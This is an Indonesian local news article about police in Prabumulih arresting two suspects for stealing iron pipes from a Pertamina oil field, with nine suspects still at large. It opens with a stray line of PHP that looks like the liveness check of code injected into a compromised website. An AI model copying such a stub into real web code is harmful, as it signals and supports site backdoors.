error_reporting(0); set_time_limit(0); if ($_GET['q']=='1'){echo '200'; exit;} AKBP.Witdiardi.SIk.MH Pimpin Press-Release Pengungkapan Kasus Pencurian Pipa Besi Milik PT.Pertamina Hulu Rokan Zona 4 Sumatera - SMI.COM

Home / PRABUMULIH

Jumat, 30 Desember 2022 - 20:18 WIB

AKBP.Witdiardi.SIk.MH Pimpin Press-Release Pengungkapan Kasus Pencurian Pipa Besi Milik PT.Pertamina Hulu Rokan Zona 4 Sumatera

Prabumulih, SMI-

PT.Pertamina Hulu Rokan Zona 4 Sumatera, Area Wilayah Pertamina Field Limau sedikit bisa bernapas lega.Hal di Karenakan aksi pencurian Pipa besi milik perusahaan BUMN ini,berhasil digagalkan oleh Polres Prabumulih melalui kepolisian Sektor Prabumulih Timur.

Berdasarkan laporan dari salah seorang Security Pertamina Hulu Rokan Zona 4 Sumatera Field Limau, Tim Opsnal Polsek Prabumulih Timur langsung bergerak dengan cepat.Sehingga alhasil 2 Orang tersangka Juli dan Supriyanto,yang keduanya tercatat sebagai Warga Masyarakat Kabupaten Muara Enim berhasil ditangkap dan di tahan oleh Polsek Prabumulih Timur.

AKBP. Witdiardi.SIk.MH Kapolres Kota Prabumulih, yang didampingi oleh Kapolsek Prabumulih Timur AKP.Bobby Eltarik.SIk.MH,Serta Kasi Humas Polres Kota Prabumulih AKP.Sri Djumianti.SH,Adam Maris selaku Legal and Relations PT.Pertamina Limau Field,Kepala Senior Officier Security PT.Pertamina Field Limau.Dalam Pers Release di depan Mapolsek Prabumulih Timur,memberitahukan bahwa pada saat ini dari 11 pelaku.Polsek Prabumulih timur telah berhasil menangkap 2 Orang pelaku dan lainnya dinyatakan masuk Daftar Pencarian Orang (DPO) karena masih buron.Hal ini adalah berdasarkan informasi pada hari Jumat (30/12/2022),Pukul 16.30 WIB.

Baca Juga :  Kelurahan Tugu Kecil Prabumulih Bakal Memiliki Destinasi Wisata Kolam Retensi

“Saat Kedua tersangka ditangkap saat tengah melakukan aksinya di TKP.Pada saat sekarang ini mereka berdua,berikut barang bukti seperti Sepeda Motor, Kotrek, cangkul, gerobak, juga mesin potong besi dan lainnya telah kita amankan di kantor polsek Prabumulih Timur ini”,Ujar AKBP.Witdiardi.SIk.MH Kapolres Kota Prabumulih.

Lebih Lanjut dalam penjelasannya Kapolres Kota Prabumulih,dalam kasus pencurian besi ini Pertamina ditafsir menderita kerugian senilai Rp. 107.000.000 (Seratus Tujuh Juta Rupiah).
“Untuk kedua tersangka ini akan kita jerat dengan pasal 363, dengan ancaman kurungan 7 tahun penjara. Dari 9 Orang tersangka DP0,yang telah kami kantongi namanya akan terus kami buru sampai ketangkap”, Ungkap Kapolres Prabumulih ini.

Baca Juga :  Dishub Kota Prabumulih Mendapat Apresiasi Walikota Prabumulih Atas Penghargaan Juara 1 Kawasan Tertib Lalu-lintas Tahun 2022

Masih berada di tempat yang sama Adam Maris Legal and Relations PT.Pertamina Limau Field,melalui Senior Officier Security PT.Pertamina Limau Field Wasto mengucapkan apresiasi dan terima kasihnya pada Polres Prabumulih.Tentunya khusus kepada Polsek Prabumulih Timur,yang telah berhasil menggagalkan aksi pencurian besi milik Pertamina dan juga sudah menangkap 2 orang pelaku.
“Kami sangat mengapresiasi dan berterima kasih atas kerja keras kepolisian ini, Sehingga aksi pencurian Pipa besi Pertamina berhasil digagalkan. Kami beserta Polres Prabumulih serta Polsek jajarannya, Tentu akan bekerja sama memberi informasi.kami harapkan semoga 9 pelaku yang masih buron,segera tertangkap hingga semuanya dapat terkuak kasus pencurian barang yang merupakan objek vital nasional ini”, Demikian Tandas Wasto Senior Officer Scurity PT.Pertamina Limau Field.(Sunar)

Share :

Baca Juga

PRABUMULIH

PLN Bersama Warga Tanjung Raman Alami Kerugian Materi Di Duga Akibat Operator Excavator Kurang Waspada

PRABUMULIH

Presidium Rambang Lubai Lematang Terima Sertifikat Dari Ir.H.Syahrial Oesman.MM

PRABUMULIH

AKBP.Witdiardi.SIk.MH Kapolres Prabumulih Melayat Ke Rumah Bripka.Fedho Artinus.SH Yang Orang Tuanya Meninggal Dunia

PRABUMULIH

Inovation & lmprovement Forum 2021 Pertamina Rokan Hulu Regional Sumatera

PRABUMULIH

H.Ir.Ridho Yahya.MM Lepas Ekspor Perdana Serat Daun Nanas ke Singapura

PRABUMULIH

PT.Pertamina Hulu Rokan Zona 4 Fasilitasi Mediasi PT.BGP lndonesia & Warga Kelurahan Muara Dua

PRABUMULIH

Iptu.Arafiq.SIP Pimpin Apel Pengamanan Soft Lauching Pengoperasian Fly Over Patih Galung Oleh Gubernur Sumsel dan Walikota Prabumulih

PRABUMULIH

PT.Perta Samtan Gas Berbagi Di Bulan Suci Ramadhan 1443 H